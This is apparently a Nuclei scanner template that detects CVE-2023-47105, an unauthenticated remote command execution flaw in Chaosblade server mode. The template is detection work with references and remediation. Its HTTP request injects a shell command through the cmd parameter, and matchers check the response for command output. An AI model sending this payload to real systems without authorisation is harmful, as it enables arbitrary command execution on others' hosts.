43 lines
1.7 KiB
YAML
43 lines
1.7 KiB
YAML
id: CVE-2023-47105
|
|
|
|
info:
|
|
name: Chaosblade < 1.7.4 - Remote Code Execution
|
|
author: s4e-io
|
|
severity: high
|
|
description: |
|
|
exec.CommandContext in Chaosblade 0.3 through 1.7.3, when server mode is used, allows OS command execution via the cmd parameter without authentication.
|
|
impact: |
|
|
This vulnerability allows unauthenticated attackers to remotely invoke the HTTP service and execute arbitrary commands on any Chaosblade instance with server mode enabled. This could lead to unauthorized access and control over the host system running Chaosblade.
|
|
remediation: Fixed in 1.7.4
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-47105
|
|
- https://github.com/advisories/GHSA-723h-x37g-f8qm
|
|
- https://github.com/chaosblade-io/chaosblade/blob/0a07380c9899febb2b544132783b376b44226cca/exec/os/executor.go#L68
|
|
- https://narrow-oatmeal-0c0.notion.site/ChaosBlade-Remote-Command-Execution-CVE-2023-47105-4f5459046488436caaec2bced6ff26d7
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L
|
|
cvss-score: 8.6
|
|
cve-id: CVE-2023-47105
|
|
cwe-id: CWE-78
|
|
epss-score: 0.00043
|
|
epss-percentile: 0.10253
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: chaosblade-io
|
|
product: chaosblade
|
|
tags: cve,cve2023,chaosblade,rce
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /chaosblade?cmd=$(id) HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains_all(body,"uid=", "code", "success\":false", "error")'
|
|
- 'status_code == 200'
|
|
condition: and
|
|
# digest: 490a0046304402203e17488a86905dddf0bd9a91fdcb02e9058c0a9bc597d69564c0fb701eb09594022046d7d1a057223f0654a28939940c300bc9a03c0838d0b6942dfd242e28d68c98:922c64590222798bb761d5b6d8e72950 |